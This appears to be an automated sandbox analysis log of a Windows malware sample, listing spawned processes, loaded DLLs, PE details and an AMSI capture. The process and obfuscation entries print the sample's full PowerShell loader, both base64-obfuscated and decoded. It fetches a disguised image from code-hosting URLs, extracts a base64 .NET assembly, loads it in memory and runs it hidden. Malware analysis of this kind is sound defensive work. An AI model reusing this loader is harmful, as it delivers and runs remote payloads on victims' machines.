        Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sodigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$a$Bn$GY$a$Bo$Gs$agBl$GU$Z$Bl$GY$Z$Bm$C8$bQBu$GI$dgBn$Go$Z$Bn$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwB0$GU$cwB0$C4$agBw$Gc$Pw$1$DM$Nw$2$DE$MQ$n$Cw$I$$n$Gg$d$B0$H$$cw$6$C8$LwBy$GE$dw$u$Gc$aQB0$Gg$dQBi$HU$cwBl$HI$YwBv$G4$d$Bl$G4$d$$u$GM$bwBt$C8$ZwBt$GU$Z$B1$HM$YQ$x$DM$NQ$v$G4$YQBu$G8$LwBy$GU$ZgBz$C8$a$Bl$GE$Z$Bz$C8$bQBh$Gk$bg$v$G4$ZQB3$F8$aQBt$Gc$MQ$y$DM$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.IkIhcga/sdaolnwod/sfwqeqw/twqewqe/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exe | Section loaded: cabinet.dll
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exe | Section loaded: version.dll
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exe | Section loaded: feclient.dll
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exe | Section loaded: iertutil.dll
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exe | Section loaded: uxtheme.dll
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exe | Section loaded: kernel.appcore.dll
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exe | Section loaded: textinputframework.dll
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exe | Section loaded: coreuicomponents.dll
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exe | Section loaded: coremessaging.dll
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exe | Section loaded: ntmarta.dll
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exe | Section loaded: wintypes.dll
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exe | Section loaded: wintypes.dll
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exe | Section loaded: wintypes.dll
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exe | Section loaded: textshaping.dll
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exe | Section loaded: advpack.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: windows.storage.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: wldp.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: propsys.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: profapi.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: edputil.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: urlmon.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: iertutil.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: srvcli.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: netutils.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: windows.staterepositoryps.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: policymanager.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: msvcp110_win.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: sspicli.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: wintypes.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: appresolver.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: bcp47langs.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: slc.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: userenv.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: sppc.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: pcacli.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: mpr.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: sfc_os.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
        Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
        Source: Window Recorder | Window detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
        Source: GdGXG0bnxH.exe | Static PE information: Image base 0x140000000 > 0x60000000
        Source: GdGXG0bnxH.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: GdGXG0bnxH.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: GdGXG0bnxH.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: GdGXG0bnxH.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: GdGXG0bnxH.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: GdGXG0bnxH.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: GdGXG0bnxH.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
        Source: GdGXG0bnxH.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: wextract.pdb source: GdGXG0bnxH.exe
        Source: Binary string: wextract.pdbGCTL source: GdGXG0bnxH.exe
        Source: Binary string: C:\Users\Administrator\source\repos\testpowershell\testpowershell\obj\Debug\testpowershell.pdb source: powershell.exe, 0000000B.00000002.1496797841.0000024985320000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.000002498DFF2000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: n.pdb{ source: powershell.exe, 0000000B.00000002.1497283898.0000024986DC9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: s\dll\System.Core.pdbn source: powershell.exe, 0000000B.00000002.1497238738.0000024986D66000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\Administrator\source\repos\testpowershell\testpowershell\obj\Debug\testpowershell.pdbG_a_ S__CorExeMainmscoree.dll source: powershell.exe, 0000000B.00000002.1496797841.0000024985320000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.000002498DFF2000.00000004.00000800.00020000.00000000.sdmp
        Source: GdGXG0bnxH.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
        Source: GdGXG0bnxH.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
        Source: GdGXG0bnxH.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
        Source: GdGXG0bnxH.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
        Source: GdGXG0bnxH.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

        Data Obfuscation

        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: $sodigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$a$Bn$GY$a$Bo$Gs$agBl$GU$Z$Bl$GY$Z$Bm$C8$bQBu$GI$dgBn$Go$Z$Bn$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwB0$GU$cwB0$C4$agBw$Gc$Pw$1$DM$Nw$2$DE$MQ$n$Cw$I$$n$Gg$d$B0$H$$cw$6$C8$LwBy$GE$dw$u$Gc$aQB0$Gg$dQBi$HU$cwBl$HI$YwBv$G4$d$Bl$G4$d$$u$GM$bwBt$C8$ZwBt$GU$Z$B1$HM$YQ$x$DM$NQ$v$G4$YQBu$G8$LwBy$GU$ZgBz$C8$a$Bl$GE$Z$Bz$C8$bQBh$Gk$bg$v$G4$ZQB3$F8$aQBt$Gc$MQ$y$DM$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$K